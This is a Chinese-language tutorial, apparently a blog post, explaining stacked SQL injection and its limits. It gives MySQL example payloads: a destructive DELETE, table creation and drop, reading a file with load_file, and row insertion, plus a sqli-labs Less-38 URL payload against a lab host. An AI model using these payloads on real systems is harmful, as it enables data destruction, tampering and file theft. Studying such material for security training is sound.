SQL注入之堆疊注入（堆查詢注入）

Stached injection -- 堆疊注入

0x00 堆疊注入的定義

​ Stacked injection 漢語翻譯過來後，稱 爲堆查詢注入，也有稱之爲堆疊注入。堆疊注入爲攻擊者提供了不少的攻擊手段，經過添加一個新的查詢或者終止查詢，能夠達到修改數據和調用存儲過程的目的。

0x01 堆疊注入的原理

​ 在SQL中，分號（;）是用來表示一條sql語句的結束。試想一下咱們在 ; 結束一個sql語句後繼續構造下一條語句，會不會一塊兒執行？所以這個想法也就造就了堆疊注入。

​ 而 union injection（聯合注入）也是將兩條語句合併在一塊兒，二者之間有什麼區別麼？區別就在於union 或者union all 執行的語句類型是有限的，只能夠用來執行查詢語句，而堆疊注入能夠執行的是任意的語句。例如如下這個例子。用戶輸入：1; DELETE FROM products，則服務器端生成的sql語句爲：

Select * from products where productid=1;DELETE FROM products

當執行命令後，第一條顯示查詢信息，第二條則將整個表進行刪除。

0x02 堆疊注入的侷限性

​ 堆疊注入也有其相對的侷限性，並非每個環境下均可以執行，可能受到API或者數據庫引擎不支持的限制，固然了權限不足也能夠解釋爲何攻擊者沒法修改數據或者調用一些程序。

​ 如圖：

​ 雖然咱們前面提到了堆疊查詢能夠執行任意的sql語句，可是這種注入方式並非十分的完美的。在咱們的web系統中，由於代碼一般只返回一個查詢結果，所以，堆疊注入第二個語句產生錯誤或者結果只能被忽略，咱們在前端界面是沒法看到返回結果的。所以，在讀取數據時，仍是建議使用 union（聯合）注入。同時在使用堆疊注入以前，咱們也是須要知道一些數據庫相關信息的，例如表名，列名等信息。

0x03 數據庫實例介紹

​ 由於筆者接觸數據庫很少，因此下面咱們從MySQL數據庫角度出發，介紹一些數據庫的基本操做，增刪查改，如下列出數據庫相關堆疊注入的基本操做。至於其餘數據庫，你們能夠本身實踐。

MySQL數據庫實例

（1）新建表

select * from user where id = 1;create table test like user;

能夠看到，咱們的語句執行成功，再去檢查一下表test是否建立成功。

show tables;

實驗顯示：表test成功建立。

（2）刪除新建的test表

select * from user where id=1;drop table test;

再去查看：

show tables;

(3) 查詢數據庫

select * from user where id=1;select 1,user(),database();

（4）加載文件

select * from user where id=1;select load_file('e:/test.txt');

（5）修改數據

select * from user where id=1;insert into user(username,password,address,sex,age) values ('范冰冰','123456','北京',2,26);

查看結果：

能夠看到，咱們剛剛添加的數據已經寫入了數據庫。

0x04 堆疊注入之sqli-labs實例

Less-38 堆疊注入 - 字符型 - GET

由下圖測試咱們能夠看到，只有3條數據：

咱們使用堆疊注入，向該數據表插入一條數據：

http://192.168.26.130/sqli/Less-38/?id=1’;insert into users(id,username,password) values (‘38’,’less38’,’ruoli’) --+

能夠看到，數據已經發生了變化，

好了，有時間了我會補充一個CTF中遇到的堆疊注入題材，以示補充。